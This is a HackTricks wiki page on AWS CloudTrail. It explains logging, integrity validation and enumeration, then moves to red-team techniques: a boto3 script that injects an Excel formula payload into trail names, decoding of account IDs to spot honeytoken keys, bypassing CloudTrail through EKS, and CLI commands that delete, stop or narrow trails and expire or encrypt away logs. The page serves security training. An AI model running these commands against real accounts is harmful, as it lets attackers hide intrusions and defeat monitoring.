{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
AWS CloudTrail records and monitors activity within your AWS environment. It captures detailed event logs, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
Each logged event contains:
- `eventName`: the name of the called API
- `eventSource`: the called service
- `eventTime`: the time of the call
- `sourceIPAddress`: the IP address the call was made from
- `userAgent`: the agent used to make the call. Examples:
  - `signin.amazonaws.com` - AWS Management Console
  - `console.amazonaws.com` - Root user of the account
  - `lambda.amazonaws.com` - AWS Lambda
- `requestParameters`: the request parameters
- `responseElements`: the response elements
Events are written to a new log file approximately every 5 minutes in JSON format; they are held by CloudTrail and, finally, log files are delivered to S3 approximately 15 minutes later.
CloudTrail logs can be aggregated across accounts and across regions.
CloudTrail lets you use log file integrity validation to verify that your log files have remained unchanged since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file; a new digest file with the hashes of the latest logs is created every hour.
When creating a trail, the event selectors allow you to indicate which events the trail should log: management, data and/or Insights events.
Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3), so AWS will decrypt the content for anyone who has access to the bucket, but for additional security you can use SSE with KMS (SSE-KMS) and your own keys.
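For example, a trail using SSE-KMS could be created like this (a minimal sketch; the trail name, bucket and KMS key ARN are placeholders, and the key policy must allow cloudtrail.amazonaws.com to use the key):

```bash
# Create a trail that delivers logs to an existing bucket, encrypted with your own KMS key (SSE-KMS)
aws cloudtrail create-trail \
  --name <trail_name> \
  --s3-bucket-name <bucket_name> \
  --kms-key-id <kms_key_arn>

# Start recording events with the new trail
aws cloudtrail start-logging --name <trail_name>
```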
The logs are stored in an S3 bucket with this name format:
`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD`
- Where BucketName has the form: `aws-cloudtrail-logs-<accountid>-<random>`
- Example: `aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`
Inside each folder, each log file has a name following this format: `AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`
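For example, assuming you have read access to the bucket, delivered log files can be listed and inspected like this (the bucket, account, region and file names are placeholders):

```bash
# List the log files delivered for a given day
aws s3 ls s3://aws-cloudtrail-logs-<accountid>-<random>/AWSLogs/<accountid>/CloudTrail/<region>/2023/02/22/

# Download one of them and extract the recorded API calls
aws s3 cp s3://aws-cloudtrail-logs-<accountid>-<random>/AWSLogs/<accountid>/CloudTrail/<region>/2023/02/22/<log_file>.json.gz .
zcat <log_file>.json.gz | jq -r '.Records[] | .eventSource + " " + .eventName'
```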
Moreover, digest files (to check file integrity) are stored in the same bucket under the `CloudTrail-Digest` prefix.
To aggregate logs from multiple accounts into a single S3 bucket:
1. Create a trail in the AWS account where you want the log files to be delivered to
2. Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail, and allow each AWS account that needs access (see the example bucket policy below)
3. Create a new trail in the other AWS accounts and select to use the bucket created in step 1
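A minimal sketch of such a cross-account bucket policy (the bucket name and account IDs are placeholders; add one `AWSLogs/<account-id>/*` resource entry per account that will write to it):

```bash
aws s3api put-bucket-policy --bucket <central_bucket> --policy '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AWSCloudTrailAclCheck",
      "Effect": "Allow",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:GetBucketAcl",
      "Resource": "arn:aws:s3:::<central_bucket>"
    },
    {
      "Sid": "AWSCloudTrailWrite",
      "Effect": "Allow",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:PutObject",
      "Resource": [
        "arn:aws:s3:::<central_bucket>/AWSLogs/<account_id_1>/*",
        "arn:aws:s3:::<central_bucket>/AWSLogs/<account_id_2>/*"
      ],
      "Condition": {"StringEquals": {"s3:x-amz-acl": "bucket-owner-full-control"}}
    }
  ]
}'
```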
However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into CloudWatch Logs belonging to a single AWS account.
{% hint style="danger" %} Remember that an account can have different Trails from CloudTrail enabled storing the same (or different) logs in different buckets. {% endhint %}
When creating a trail, it's possible to indicate that you want to activate CloudTrail for all the accounts in the organization and send the logs to just one bucket:
This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in one account (which you should protect).
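A minimal sketch of this, assuming it's run from the organization's management account (or a delegated CloudTrail administrator) with trusted access for CloudTrail enabled in AWS Organizations:

```bash
# Multi-region organization trail that delivers every member account's logs to one central bucket
aws cloudtrail create-trail \
  --name <org_trail_name> \
  --s3-bucket-name <central_bucket> \
  --is-multi-region-trail \
  --is-organization-trail

aws cloudtrail start-logging --name <org_trail_name>
```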
You can check that the log files haven't been altered by running:
{% code overflow="wrap" %}
aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
{% endcode %}
CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed.
Note that in order to allow CloudTrail to send the logs to CloudWatch, a role needs to be created that allows that action. If possible, it's recommended to use the AWS default role to perform these actions. This role will allow CloudTrail to (a sketch of the CLI wiring follows this list):
- CreateLogStream: create CloudWatch Logs log streams
- PutLogEvents: deliver CloudTrail logs to the CloudWatch Logs log stream
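A minimal sketch of wiring an existing trail to CloudWatch Logs (the log group, role and trail names are placeholders; the role must be assumable by cloudtrail.amazonaws.com and grant the two permissions above):

```bash
# Send the trail's events to an existing CloudWatch Logs log group
aws cloudtrail update-trail \
  --name <trail_name> \
  --cloud-watch-logs-log-group-arn arn:aws:logs:<region>:<account_id>:log-group:<log_group_name>:* \
  --cloud-watch-logs-role-arn arn:aws:iam::<account_id>:role/<cloudtrail_to_cloudwatch_role>
```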
CloudTrail Event History allows you to inspect the recorded events in a table:
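The same history can also be queried from the CLI, for example (the event name and time window are just illustrative values):

```bash
# Look up recent ConsoleLogin events in the CloudTrail Event History
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time 2023-02-01T00:00:00Z --end-time 2023-02-22T00:00:00Z \
  --max-results 10
```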
CloudTrail Insights automatically analyzes write management events from CloudTrail trails and alerts you to unusual activity. For example, if there is an increase in TerminateInstances events that differs from established baselines, you'll see it as an Insights event. These events make finding and responding to unusual API activity easier than ever.
The insights are stored in the same bucket as the CloudTrail logs in: BucketName/AWSLogs/AccountID/CloudTrail-Insight
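Insights have to be enabled per trail; a minimal sketch of enabling and checking them from the CLI (the trail name is a placeholder):

```bash
# Enable both Insights types on a trail
aws cloudtrail put-insight-selectors --trail-name <trail_name> \
  --insight-selectors '[{"InsightType": "ApiCallRateInsight"}, {"InsightType": "ApiErrorRateInsight"}]'

# Check which Insights are enabled
aws cloudtrail get-insight-selectors --trail-name <trail_name>
```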
Some protections to keep CloudTrail logs trustworthy (a sketch of two of them follows this list):
- CloudTrail log file integrity validation
- Stop unauthorized access to the logs
- Prevent log files from being deleted
AWS Access Advisor relies on the last 400 days of AWS CloudTrail logs to gather its insights. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to show when services were last accessed. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about refining permissions, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
{% hint style="success" %} Therefore, Access Advisor informs about the unnecessary permissions being given to users so the admin could remove them {% endhint %}
```bash
# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]

# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>

# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>
```
It's possible to perform a CSV injection inside CloudTrail that will execute arbitrary code if the logs are exported as CSV and opened with Excel.
The following code will generate a log entry with a malicious trail name containing the payload:
```python
import boto3
from botocore.exceptions import ClientError

# CSV/formula injection payload executed if the exported CSV is opened in Excel
payload = "=cmd|'/C calc'|''"

client = boto3.client('cloudtrail')
try:
    # The call fails because the name is invalid, but the attempt (with the
    # payload as the trail name) is still recorded as a CloudTrail event
    response = client.create_trail(Name=payload, S3BucketName="random")
    print(response)
except ClientError as e:
    print(e)
```
For more information about CSV Injections check the page:
{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %}
For more information about this specific technique check https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/
Honeytokens are created to detect exfiltration of sensitive information. In the case of AWS, they are AWS keys whose use is monitored; if something triggers an action with that key, then someone must have stolen it.
However, honeytokens like the ones created by Canarytokens, SpaceCrab or SpaceSiren either use a recognizable account name or use the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making CloudTrail create any log, you can tell whether the key is a honeytoken.
Pacu has some rules to detect if a key belongs to Canarytokens, SpaceCrab or SpaceSiren:
- If `canarytokens.org` appears in the role name or the account ID `534261010715` appears in the error message.
  - Testing them more recently, they are using the account `717712589309` and still have the `canarytokens.com` string in the name.
- If `SpaceCrab` appears in the role name in the error message.
- SpaceSiren uses UUIDs to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
- If the name looks randomly generated, there is a high probability that it's a honeytoken.
You can get the account ID encoded inside the access key as explained here and check it against your list of honeytoken AWS account IDs:
```python
import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):
    trimmed_AWSKeyID = AWSKeyID[4:] # remove the KeyID prefix (e.g. AKIA/ASIA)
    x = base64.b32decode(trimmed_AWSKeyID) # base32 decode
    y = x[0:6]
    z = int.from_bytes(y, byteorder='big', signed=False)
    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
    e = (z & mask) >> 7
    return e

print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
```
Check more information in the original research.
The most effective technique for this is actually a simple one: just use the key you found to access some service inside your own attacker account. This will make CloudTrail generate a log inside YOUR OWN AWS account and not inside the victim's.
The thing is that the output will show you an error indicating the account ID and the account name, so you will be able to see whether it's a honeytoken.
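A minimal sketch of this idea, assuming the found credentials are configured in a profile called stolen and that you own an SNS topic in your own account (the topic ARN is a placeholder); the authorization error typically contains the caller's full ARN:

```bash
# Publish to a topic in YOUR account with the suspicious key: the request is evaluated
# against your resources, and the AuthorizationError message leaks the key's account ID and name
aws sns publish --profile stolen \
  --topic-arn arn:aws:sns:us-east-1:<your_account_id>:<your_topic> \
  --message test
```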
In the past there were some AWS services that didn't send logs to CloudTrail (find a list here). Some of those services will respond with an error containing the ARN of the key's role if someone unauthorized (the honeytoken key) tries to access them.
This way, an attacker can obtain the ARN of the key without triggering any log. In the ARN the attacker can see the AWS account ID and the name; since the account IDs and names of the honeytoken companies are well known, this way an attacker can identify whether the token is a honeytoken.
{% hint style="danger" %} Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...
For more information check the original research. {% endhint %}
Certain AWS services will spawn some infrastructure such as Databases or Kubernetes clusters (EKS). A user talking directly to those services (like the Kubernetes API) won’t use the AWS API, so CloudTrail won’t be able to see this communication.
Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and talk to the API service directly without getting detected by CloudTrail.
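A minimal sketch of the idea, assuming you already know the cluster name and its API endpoint (both placeholders below):

```bash
# Generate a Kubernetes authentication token for the cluster locally
TOKEN=$(aws eks get-token --cluster-name <cluster_name> --query 'status.token' --output text)

# Talk to the Kubernetes API endpoint directly instead of the AWS API
kubectl --server "https://<eks_api_endpoint>" --token "$TOKEN" \
  --insecure-skip-tls-verify get pods --all-namespaces
```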
More info in:
{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %} aws-eks-post-exploitation.md {% endcontent-ref %}
An attacker with enough permissions can simply delete a trail or stop it from logging:

```bash
# Delete a trail
aws cloudtrail delete-trail --name [trail-name]

# Stop a trail from recording events
aws cloudtrail stop-logging --name [trail-name]
```
{% code overflow="wrap" %}
# Configure the trail to log only one region and skip global service events
aws cloudtrail update-trail --name [trail-name] --no-is-multi-region-trail --no-include-global-service-events
{% endcode %}
{% code overflow="wrap" %}
# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>
# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>
{% endcode %}
In the first example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" setting indicates that the event selector should only capture read-only events (so, for example, CloudTrail Insights won't be checking write events). You can customize the event selectors based on your specific requirements.
{% code overflow="wrap" %}
# Expire (delete) the CloudTrail logs in the bucket after 7 days
aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>
{% endcode %}
Other options to prevent CloudTrail logs from being available:
- Delete the S3 bucket
- Change the bucket policy to deny any writes from the CloudTrail service
- Add a lifecycle policy to the S3 bucket to delete objects
- Disable the KMS key used to encrypt the CloudTrail logs
You could generate an asymmetric key, make CloudTrail encrypt the data with that key, and delete the private key so the CloudTrail contents cannot be recovered.
This is basically S3-KMS ransomware, explained in:
{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %} aws-s3-post-exploitation.md {% endcontent-ref %}
KMS ransomware is an easier way to perform the previous attack with different permission requirements:
{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %} aws-kms-post-exploitation.md {% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.